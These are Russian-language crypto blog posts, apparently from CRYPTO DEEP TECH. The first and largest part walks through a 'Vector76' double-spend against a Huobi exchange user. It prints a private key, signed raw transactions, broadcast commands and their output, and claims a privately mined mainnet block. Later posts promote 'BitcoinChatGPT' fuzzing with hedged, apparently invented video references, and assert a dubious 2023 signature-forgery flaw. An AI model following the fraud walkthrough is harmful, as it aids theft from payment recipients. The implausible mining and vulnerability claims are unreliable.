Теперь воспользуемся Python скриптом: pushtx.py для отправки Bitcoin Transaction RawTX

!python3 pushtx.py 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Результат:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000 TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0 Transaction successfully broadcasted! Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

Псевдополучатель пользователь криптобиржи Huobi видит платеж в сети Биткоин TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Теперь злоумышленник приступает ко второму этапу, создание транзакции T2 (для себя) чтобы забрать все монеты на отправленную сумму 1.17506256 BTC (117506256 sat/vByte) из сети Биткоин на баланс своего холодного кошелька.

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Создание Raw транзакции T2 (для себя)

Ранее мы создали холодный Биткоин Кошелек, это мы делали заранее именно для создание второй транзакции (для себя T2) чтобы подготовить Биткоин Кошелек: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq куда мы отправим из сети Биткоин все монеты на сумму: 1.17506256 BTC (117506256 sat/vByte) для дальнейшего хранение в холодный кошелек).

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Скопируем Биткоин Адрес нового холодного кошелька:

Cold Bitcoin Wallet: Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Запускаем повторно программное обеспечение Dockeyhunt Vector76 Attack.

Добавим новую опцию с новыми данными

Опция:

Все тоже самое для создание транзакции нам необходимо подписать цифровую подпись алгоритмом ECDSA вставим в поле приватный ключ отправителя Биткоин Кошелька: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz (для проверки мы можем воспользоваться bitaddress)

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Скопируем TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 и вставим в поле это необходимо для того чтобы была полная проверка транзакций для всех узлов сети Биткоин, так как все входы транзакции являются действительными (это очень важно и необходимо для проведение успешной атаки Vector76 с целью чтобы монеты BTC отправителя не были потрачены заранее). UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Скопируем новый Биткоин Адрес нового холодного кошелька куда мы перенесем все монеты BTC: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq и вставим в поле.

Send Address: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Скопируем общую сумму Биткоин монет и вставим в поле (для данного отправителя это сумма составляет: 1.17521256 BTC сумму необходимо указать в Satoshi в размере: 117521256)

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Укажем собственную сумму в размере: 15000 sat/vByte это сумма является комиссий, для процесса обработки транзакций майнером. В Биткоине, когда мы отправляем транзакцию, мы платим комиссию майнерам за включение наше созданное Raw транзакции в блокчейн (эта комиссии стимулируют майнеров обрабатывать и подтверждать транзакции).

Fee: 0.00015000 BTC (15000 sat/vByte)

Укажем сумму для отправки монет BTC в нашем случае при выщите с общей суммы 117521256 sat/vByte и размера комиссии: 15000 sat/vByte сумма для отправки будет составлять в Satoshi: 117506256

Sent: 1.17506256 BTC (117506256 sat/vByte)

После того как мы добавили все опции нажимаем Create Transaction

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Результат:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz

Bitcoin Address for sending BTC: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Bitcoin Transaction RawTX: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000

Теперь воспользуемся Python скриптом: pushtx.py для отправки Bitcoin Transaction RawTX

!python3 pushtx.py

Результат:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000

TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc

Transaction successfully broadcasted!

Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

Теперь мы получили TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc осталось лишь добыть блок с помощью майнинга и опубликовать блок в основную цепочку блоков которая включает транзакцию T2 (для себя).

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Майнинг и публикация блока в основную цепочку сети Биткоин

Вернемся в корневой каталог, откроем папку и запустим программное обеспечение Block Bitcoin Mining

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Чтобы добавить в пустое поле опцию нам необходимо получить данные ввода определенных значении для настройки майнинг блока для этого запустим Python скрипт: block_header.py и водим известное нам UTXO значение которое мы ранее добавляли в хэш опции Prev TXID при создание Raw транзакции Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).

!python3 block_header.py 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Скопируем полученные данные:

Enter TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Block Header:

Block: 00000000000000000003e5557c14e955f2c88465bb8c02a4d694a3657a40d79e

Block Height: 808875

Mined Time: 2023-09-22T17:29:25Z

Prev Block: 000000000000000000048e0643366b7c0129d2dd8d2cf758ca6273ed81c765d8

Merkle Root: c1fc30413e984cdd90dc1ac91a69add6c138af950e1c6388cb20759494073d2c

Nonce: 1098256692

Bits: 386198911

Version: 536903680

Добавим RawTX для транзакции T2 (для себя)

Bitcoin Transaction RawTX: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Как только блок для транзакции T2 (для себя) будет добыт с помощью программного обеспечение Block Bitcoin Mining мы получим файл в формате JSON

Наш добытый блок для подтверждение в общей цепочке блокчейна находится в файле: block_hash_mining.json

Откроем файл: block_hash_mining.json с помощью Notepad++

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В строке №875 мы видим новый блок.

block_hash: 00000000000000000004401ea0694af9c89564d76bc5462577e312eea5d23fa2

Вернемся обратно в Google Colab и запустим Python скрипт вводим TXID транзакции T2 (для себя)

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

ВСЕ ВЕРНО!!!

Блок подтверждает подлинность транзакции T2 (для себя).

Также проверим по ссылке в блокчейне:

https://btc1.trezor.io/tx/d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc

Платеж подтвержден майнерами

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Транзакция T1 (жертва) отменяется

Платеж псевдополучатель пользователя криптобиржи Huobi автоматический отменяется в сети Биткоин TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

https://btc1.trezor.io/tx/e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Транзакция не найдена по причине отсутствие в общей цепочке блока

Заключение:

Все эти программные обеспечение и инструменты облегчают создание мошеннических схем, что может привести к увеличению числа жертв и потерь монет BTC и ETH среди пользователей. Это, в свою очередь, может вызвать негативное отношение к криптовалютам и криптосообществу в целом.

Ущерб для бизнеса: Многие компании и сервисы, принимающие Bitcoin, могут понести значительные убытки из-за использования поддельных транзакций. Это может привести к отказу от принятия Bitcoin в качестве средства оплаты, что также негативно скажется на его распространении.

Усложнение регулирования: Использование таких программных обеспечений усложняет работу регуляторов и правоохранительных органов, которые пытаются бороться с мошенничеством и отмыванием денег. Это может привести к ужесточению регулирования и ограничений на использование криптовалют.

Необходимость улучшения безопасности: Постоянные угрозы требуют от разработчиков и пользователей внедрения новых мер безопасности и улучшения существующих механизмов защиты. Сообщество разработчиков Bitcoin может принять меры для борьбы с мошенническими транзакциями. Это может включать улучшение алгоритмов подтверждения транзакций и введение новых протоколов безопасности. Однако такие меры могут потребовать значительных ресурсов и времени.

References:

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/Mk_BPBCXd3I

DZEN: https://dzen.ru/video/watch/669558eb4bbd297f7d375e06

Источник: https://cryptodeep.ru/vector76-attack

Показать полностью 20 4
1

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты

В криптографических приложениях и криптовалютных кошельках есть критически важные компоненты, такие как генерация ключей, шифрование/дешифрование, подпись транзакций и.т.д. Эти компоненты должны быть основными целями для Фаззинг-тестирования. Использование Фаззинг-тестирования в криптографических приложениях и криптовалютных кошельках помогает выявлять и устранять уязвимости, повышая безопасность и надежность программного обеспечения.

Фаззинг-тестирование (или просто Фаззинг) — это метод тестирования программного обеспечения, который используется для выявления уязвимостей и ошибок путем подачи на вход программы случайных или специально сгенерированных данных. В контексте криптоанализа Фаззинг-тестирование применяется для проверки криптографических алгоритмов и систем на наличие слабых мест, которые могут быть использованы злоумышленниками.

Основная идея Фаззинга заключается в том, чтобы автоматически генерировать большое количество случайных или некорректных входных данных и подавать их на вход тестируемой системе. Затем анализируются результаты работы системы с этими данными, чтобы выявить неожиданные поведения, сбои или уязвимости.

Фаззинг-тестирование в криптоанализе может помочь обнаружить такие проблемы, как:

  1. Буферные переполнения: Ошибки, возникающие при записи данных за пределы выделенной памяти.

  2. Ошибки обработки исключений: Неправильная обработка неожиданных или некорректных данных.

  3. Уязвимости в алгоритмах: Недостатки в реализации криптографических алгоритмов, которые могут быть использованы для взлома.

Этот метод является мощным инструментом для обеспечения безопасности криптографических систем и помогает разработчикам создавать более надежное и защищенное программное обеспечение.

Применение Фаззинг-тестирования к криптовалютным кошелькам имеет несколько преимуществ:

  1. Обнаружение уязвимостей: Фаззинг помогает выявить уязвимости, которые могут быть использованы злоумышленниками для кражи средств или компрометации безопасности кошелька.

  2. Повышение надежности: Тестирование с использованием случайных данных помогает выявить ошибки, которые могут привести к сбоям или некорректной работе кошелька, что в свою очередь повышает его надежность.

  3. Автоматизация процесса тестирования: Фаззинг-тестирование можно автоматизировать, что позволяет проводить тесты более часто и эффективно, чем ручное тестирование.

  4. Разнообразие тестовых сценариев: Фаззинг генерирует большое количество разнообразных тестовых сценариев, что помогает выявить ошибки, которые могли бы остаться незамеченными при использовании традиционных методов тестирования.

  5. Улучшение безопасности: Регулярное Фаззинг-тестирование помогает разработчикам своевременно обнаруживать и устранять уязвимости, что повышает общий уровень безопасности криптовалютного кошелька.

  6. Экономия времени и ресурсов: Автоматизированное Фаззинг-тестирование может сэкономить время и ресурсы, которые в противном случае были бы потрачены на ручное тестирование и отладку.

Фаззинг может помочь обнаружить следующие типы уязвимостей:

  1. Ошибки обработки ввода: Кошельки могут некорректно обрабатывать входные данные, такие как адреса, суммы транзакций или ключи. Фаззинг может выявить случаи, когда некорректные данные приводят к сбоям или неправильной работе кошелька.

  2. Переполнение буфера: Если Биткоин кошелек не проверяет длину входных данных, это может привести к переполнению буфера, что в свою очередь может быть использовано злоумышленниками для выполнения произвольного кода.

  3. Уязвимости в парсерах: Кошельки часто используют парсеры для обработки данных транзакций и других входных данных. Фаззинг может выявить ошибки в этих парсерах, которые могут привести к сбоям или уязвимостям безопасности.

  4. Ошибки в криптографических операциях: Некорректная обработка данных в криптографических операциях может привести к утечке приватных ключей или другим критическим уязвимостям. Фаззинг может помочь выявить такие ошибки.

  5. Уязвимости в API: Если Биткоин кошелек предоставляет API для взаимодействия с другими приложениями, Фаззинг может выявить уязвимости в этих интерфейсах, которые могут быть использованы для несанкционированного доступа или выполнения нежелательных операций.

  6. Ошибки в обработке транзакций: Фаззинг может выявить ошибки в логике обработки транзакций, которые могут привести к неправильному выполнению транзакций или даже к потере средств.

BitcoinChatGPT и выбор инструмента для Фаззинга:

Существует множество инструментов для Фаззинг-тестирования, таких как AFL (American Fuzzy Lop), libFuzzer, Honggfuzz и другие. Фаззинг-тестирование должно быть частью непрерывного процесса разработки и тестирования. Регулярное проведение Фаззинг-тестов поможет своевременно выявлять новые уязвимости и поддерживать высокий уровень безопасности криптовалютного кошелька. В начале 2024 года широкую популярность получили современные технологии которые развивают предварительно обученную модель Bitcoin ChatGPT и находят эффективные способы решение сложных криптографических задач, лежащих в основе метода Фаззинг-тестирования. Рассмотрим пример построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

BitcoinChatGPT №3 Fuzzing Vulnerability Algorithm

Эти инструменты могут помочь выявить уязвимости и улучшить безопасность криптовалютных кошельков.

AFL (American Fuzzy Lop)

Это один из самых популярных инструментов для Фаззинг-тестирования. Он может быть настроен для тестирования различных типов программного обеспечения, включая криптовалютные кошельки. American Fuzzy Lop (AFL) — это мощный инструмент для Фаззинг-тестирования, который обычно используется для нахождения уязвимостей в программном обеспечении. Хотя AFL в основном используется через командную строку, вы можете написать Python-скрипт для автоматизации его запуска. Для начала, убедитесь, что у вас установлен AFL. Если нет, вы можете установить его, следуя инструкциям на официальном сайте AFL.

На YouTube можно найти множество полезных видеороликов, которые помогут вам лучше понять и использовать AFL. Вот несколько рекомендаций:

  1. “American Fuzzy Lop (AFL) Tutorial” — В этом видео обычно объясняются основы использования AFL, как его установить и начать работу с ним.

  2. “Fuzzing with AFL: A Practical Guide” — Это видео может предложить практическое руководство по Фаззинг-тестированию с использованием AFL, включая примеры и демонстрации.

  3. “Advanced Fuzzing Techniques with AFL” — В этом видео могут быть рассмотрены более продвинутые техники и стратегии для эффективного использования AFL.

  4. “AFL Fuzzing: Finding Bugs in Real-World Applications” — Это видео может показать, как использовать AFL для нахождения уязвимостей в реальных приложениях, с примерами и анализом.

  5. “Setting Up AFL for Fuzz Testing” — В этом видео может быть пошагово показано, как настроить AFL для Фаззинг-тестирования на вашей системе.

Эти видеоролики помогут вам лучше понять, как использовать AFL для тестирования безопасности вашего программного обеспечения.

libFuzzer

Это библиотека для Фаззинг-тестирования, которая интегрируется с LLVM. Она может быть использована для тестирования программ на C и C++. LibFuzzer — это инструмент для fuzz-тестирования, который обычно используется с C/C++ программами. Однако, вы можете использовать Python для автоматизации запуска LibFuzzer.

  1. “Introduction to Fuzzing with libFuzzer” – Этот видеоролик предоставляет базовое введение в использование libFuzzer для начинающих.

  2. “Fuzzing with libFuzzer and AddressSanitizer” – В этом видео объясняется, как использовать libFuzzer вместе с AddressSanitizer для обнаружения уязвимостей в коде.

  3. “Advanced Fuzzing Techniques with libFuzzer” – Этот ролик подходит для тех, кто уже знаком с основами и хочет углубить свои знания.

  4. “Google Testing Blog: libFuzzer Tutorial” – Видеоурок от команды Google, который охватывает различные аспекты использования libFuzzer.

  5. “Fuzzing C/C++ Programs with libFuzzer” – В этом видео рассматриваются конкретные примеры и демонстрируется процесс Фаззинга C/C++ программ.

Эти видеоролики помогут вам лучше понять, как использовать libFuzzer для тестирования и улучшения безопасности вашего кода.

Honggfuzz

Это еще один мощный инструмент для Фаззинг-тестирования, который поддерживает различные типы программного обеспечения и может быть использован для тестирования криптовалютных кошельков. Honggfuzz — это мощный инструмент для fuzz-тестирования, который можно запускать из Python с помощью модуля subprocess.

  1. “Fuzzing with Honggfuzz” – Этот видеоролик может предоставить вам общее представление о том, как начать работу с Honggfuzz, включая установку и базовые команды.

  2. “Advanced Fuzzing Techniques with Honggfuzz” – В этом видео могут быть рассмотрены более продвинутые техники и настройки для использования Honggfuzz, что может быть полезно для более опытных пользователей.

  3. “Honggfuzz Tutorial for Beginners” – Если вы только начинаете, этот видеоролик может быть отличным стартом, так как он, вероятно, охватывает основные концепции и шаги по настройке.

  4. “Integrating Honggfuzz with CI/CD Pipelines” – Это видео может показать, как интегрировать Honggfuzz в ваши процессы непрерывной интеграции и доставки, что может быть полезно для автоматизации тестирования.

OSS-Fuzz

Это сервис от Google, который предоставляет инфраструктуру для непрерывного Фаззинг-тестирования с открытым исходным кодом. Он поддерживает множество проектов и может быть настроен для тестирования криптовалютных кошельков. OSS-Fuzz помогает находить ошибки в программном обеспечении с открытым исходным кодом с помощью fuzz-тестирования. Однако, OSS-Fuzz не запускается напрямую через Python-код. Вместо этого, вы должны настроить проект для использования OSS-Fuzz, а затем запустить его через командную строку.

Рассмотрим ример того, как можно настроить и запустить fuzz-тестирование для вашего проекта с использованием OSS-Fuzz.

  1. “OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Этот видеоролик от Google Open Source рассказывает о том, как работает OSS-Fuzz и как он помогает улучшать безопасность и стабильность открытого программного обеспечения.

  2. “Fuzzing with OSS-Fuzz” – В этом видео подробно объясняется, как начать использовать OSS-Fuzz для вашего проекта, включая настройку и интеграцию.

  3. “Google OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Презентация от Google, которая охватывает основные концепции и преимущества использования OSS-Fuzz.

  4. “Fuzzing 101: Getting Started with OSS-Fuzz” – Учебное пособие для начинающих, которое шаг за шагом объясняет, как начать работу с OSS-Fuzz.

  5. “Integrating Your Project with OSS-Fuzz” – В этом видео рассматриваются практические аспекты интеграции вашего проекта с OSS-Fuzz, включая примеры кода и советы по устранению неполадок.

Radamsa

Это генератор случайных данных, который может быть использован для Фаззинг-тестирования. Он прост в использовании и может быть интегрирован в различные тестовые сценарии. Radamsa — это инструмент для генерации случайных данных (fuzzing), который может быть полезен для тестирования программного обеспечения.

  1. “Fuzzing with Radamsa” – В этом видео объясняется, как использовать Radamsa для Фаззинга (тестирования программного обеспечения на наличие уязвимостей).

  2. “Introduction to Fuzz Testing with Radamsa” – Введение в Фазз-тестирование с использованием Radamsa, включая основные принципы и примеры.

  3. “Radamsa: A Fuzzing Tool for Security Testing” – Обзор возможностей Radamsa и его применения в области безопасности.

  4. “How to Use Radamsa for Fuzz Testing” – Пошаговое руководство по использованию Radamsa для Фазз-тестирования.

Echidna

Это инструмент для Фаззинг-тестирования смарт-контрактов на языке Solidity, который может быть полезен для тестирования кошельков, взаимодействующих с Ethereum.

  1. “Echidna: Fuzzing for Ethereum Smart Contracts” – Этот видеоролик объясняет основы использования Echidna для тестирования смарт-контрактов на Ethereum.

  2. “Fuzzing Smart Contracts with Echidna” – В этом видео подробно рассматривается процесс настройки и запуска Echidna для Фаззинга смарт-контрактов.

  3. “Echidna: A Fuzzer for Ethereum Smart Contracts” – В этом видео обсуждаются различные аспекты и возможности Echidna, а также примеры использования.

  4. “Smart Contract Security: Fuzzing with Echidna” – Видеоролик, который фокусируется на безопасности смарт-контрактов и использовании Echidna для нахождения уязвимостей.

Peach Fuzzer

Коммерческий инструмент для Фаззинг-тестирования, который поддерживает множество протоколов и форматов данных. Он может быть использован для тестирования безопасности криптовалютных кошельков. Peach Fuzzer — это популярная платформа Фаззинга, используемая для проверки безопасности и надежности программного обеспечения путем предоставления неожиданных или случайных входных данных.

  1. “Peach Fuzzer Tutorial” – В этом видео обычно объясняются основы использования Peach Fuzzer, включая установку и настройку.

  2. “Fuzzing with Peach: A Beginner’s Guide” – Это видео может быть полезно для тех, кто только начинает работать с Peach Fuzzer и хочет понять основные концепции и методы.

  3. “Advanced Peach Fuzzer Techniques” – В этом видео рассматриваются более сложные аспекты использования Peach Fuzzer, такие как создание собственных тестов и анализ результатов.

  4. “Peach Fuzzer in Action: Real-World Examples” – Здесь можно увидеть, как Peach Fuzzer используется для нахождения уязвимостей в реальных приложениях.

  5. “Setting Up a Fuzzing Environment with Peach” – Это видео поможет вам настроить рабочую среду для эффективного использования Peach Fuzzer.

Peach Fuzzer не написан на Python, и для его запуска обычно требуются файлы конфигурации и определенные шаги настройки.

Чтобы запустить Peach Fuzzer, вам обычно необходимо создать XML-файл Peach Pit, который определяет структуру данных, которые вы хотите Фаззить, и целевое приложение. Затем вы используете инструмент командной строки Peach для выполнения процесса Фаззинга.

Заключение:

Фаззинг представляет собой мощный метод тестирования безопасности, который может значительно повысить устойчивость криптовалютных систем, таких как Bitcoin. В ходе исследования были выявлены потенциальные уязвимости и слабые места в программном обеспечении Bitcoin, что подчеркивает необходимость постоянного мониторинга и улучшения безопасности. Применение фаззинга позволяет не только обнаруживать ошибки на ранних стадиях разработки, но и предотвращать возможные атаки, что особенно важно в условиях растущей популярности и значимости криптовалют. В будущем, интеграция фаззинга в стандартные процедуры тестирования может стать ключевым шагом к обеспечению надежности и безопасности децентрализованных финансовых систем.

References:

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

BitcoinChatGPT

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/CU4CFoxgKc8

Dzen Video Tutorial: https://dzen.ru/video/watch/665f6986a2886608ad194e31

Источник: https://cryptodeep.ru/fuzzing-bitcoin

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты Криптовалюта, Биткоины, Инновации, Технологии, Чат-бот, Хакеры, Заработок в интернете, Арбитраж криптовалюты, Ethereum, Eth, P2P, Деньги, Биржа, Заработок, Трейдинг, Кошелек, Криптография, Коины, Стартап, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост
Показать полностью 1 15
0

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA

В этом исследовании мы рассмотрим уязвимость DeserializeSignature, которая позволяла злоумышленникам создавать недействительные подписи ECDSA в сети Биткоин. В криптографии цифровая подпись ECDSA – это математическая схема, позволяющая доказать подлинность цифрового сообщения или документа. В сети Bitcoin подписи используются для авторизации транзакций, подтверждая, что владелец определенного количества биткоинов действительно согласен на их перевод. Однако, уязвимость в функции DeserializeSignature, обнаруженная в 2023 году, позволяла злоумышленникам создавать недействительные подписи, которые могли быть приняты сетью как валидные.

Принцип работы DeserializeSignature

Функция DeserializeSignature отвечает за десериализацию (преобразование из последовательности байтов) цифровой подписи в объект, который может быть использован для проверки ее валидности. Эта функция ожидает определенный формат данных, соответствующий стандарту криптографии с открытым ключом (ECDSA) используемому в Bitcoin. Функция DeserializeSignature принимает подпись транзакции и проверяет ее соответствие с полученным в результате вычисления хешем. Если подпись является корректной, DeserializeSignature возвращает true, иначе – false. Суть уязвимости заключалась в том, что DeserializeSignature не проверяла корректность всех параметров подписи перед ее десериализацией. В частности, функция не проверяла, является ли значение “R” или “S” подписи нулевым. Это позволяло злоумышленникам создавать подписи с нулевыми значениями, которые, несмотря на свою невалидность, могли быть приняты некоторыми клиентами Bitcoin как корректные. Злоумышленник может создать фальшивую подпись транзакции, которая будет принята как корректная, если она будет передана функции DeserializeSignature с неправильными данными.

Потенциальные угрозы и примеры атаки

Данная уязвимость представляла серьезную угрозу для безопасности сети Bitcoin. Злоумышленники могли использовать ее для:

  • Кражи биткоинов: создавая недействительные подписи, злоумышленники могли авторизовать транзакции, переводящие биткоины с чужих кошельков на свои.

  • Двойного расходования: подписи с нулевыми значениями могли быть использованы для создания двух разных транзакций с одними и теми же биткоинами.

  • Манипуляция данными в блокчейне: злоумышленник может создать фальшивую транзакцию, подпись которой будет принята как корректная, и добавить ее в блокчейн. Это может привести к изменению баланса счетов.

  • Атака на систему подтверждения транзакций: злоумышленник может создать фальшивую подпись транзакции и отправить ее на подтверждение в сеть.

Процесс DeserializeSignature

DeserializeSignature — это процесс преобразования последовательности байтов в структуру данных, которая может быть использована для проверки подлинности транзакции. В контексте Bitcoin, подпись создается с использованием алгоритма ECDSA (Elliptic Curve Digital Signature Algorithm) и включает в себя два компонента: r и s. В контексте криптовалют, подписи используются для подтверждения подлинности транзакций и обеспечения их целостности. Уязвимость DeserializeSignature возникает, когда злоумышленник может манипулировать процессом десериализации, чтобы изменить или подделать данные подписи.

Шаги десериализации:

  1. Чтение данных: Первым шагом является чтение последовательности байтов, представляющих подпись. Эти данные обычно хранятся в DER (Distinguished Encoding Rules) формате.

  2. Проверка формата: Проверяется, соответствует ли последовательность байтов ожидаемому формату DER. Это включает в себя проверку длины и структуры данных.

  3. Извлечение компонентов: Из последовательности байтов извлекаются компоненты r и s. Эти компоненты представляют собой целые числа, которые используются для проверки подписи.

  4. Проверка значений: Проверяется, находятся ли значения r и s в допустимых пределах. Это важно для предотвращения атак, связанных с подделкой подписей.

Потенциальные точки отказа

Процесс DeserializeSignature может быть уязвим к различным атакам и ошибкам. Рассмотрим основные потенциальные точки отказа:

1. Неправильная проверка формата

Если проверка формата DER выполнена некорректно, это может привести к тому, что недопустимые подписи будут считаться действительными. Это может позволить злоумышленникам подделывать подписи и совершать несанкционированные транзакции.

2. Уязвимости в библиотеке

Использование уязвимых библиотек для десериализации может привести к различным атакам, таким как переполнение буфера или выполнение произвольного кода. Важно использовать проверенные и обновленные библиотеки для работы с подписями.

3. Недостаточная проверка значений

Если значения r и s не проверяются должным образом, это может позволить злоумышленникам использовать некорректные значения для создания поддельных подписей. Например, значения r и s должны быть в пределах от 1 до n-1, где n — это порядок эллиптической кривой.

